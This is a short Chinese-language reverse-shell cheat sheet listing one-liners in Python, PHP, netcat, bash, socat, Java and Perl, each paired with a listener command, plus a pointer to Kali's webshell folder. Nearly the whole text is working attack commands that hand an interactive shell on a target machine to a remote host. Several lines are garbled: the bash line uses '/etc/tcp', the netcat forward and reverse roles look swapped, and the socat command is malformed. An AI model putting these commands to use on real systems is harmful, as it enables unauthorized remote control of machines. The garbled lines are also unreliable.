反弹shell

• python
• php
• netcat
• bash
• socket
• java
• perl
• msfvenom
• kali webshells

python

弹出终端python -c \'import pty; pty.spawn(\"/bin/bash\")\'

靶机：python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);\'测试机：nc -nvlp port

php

靶机：<?php $sock=fsockopen(\"192.168.238.143\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");?>测试机：nc -nvlp port

netcat

靶机：nc -lvp port -t -e /bin/bash测试机： nc ip port正向靶机：nc -lvp  4444 -t -e /bin/bash测试机：nc -nv ip 444反向靶机：nc -lvp 4444测试机：nc -t -e /bin/bash ip port

bash

bash -i >& /etc/tcp/[ip]/[port] 0>&1nc -nvlp port

socket

socat TCP-LISTEN:port/tmp/socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:ip port

java

r = Runtime.getRuntime()p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done\"] as String[])p.waitFor()

perl

perl -e \'use Socket;$i=\"ip\";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};\'

msfvenom

常见fantanshell

kali webshells

/usr/share/webshells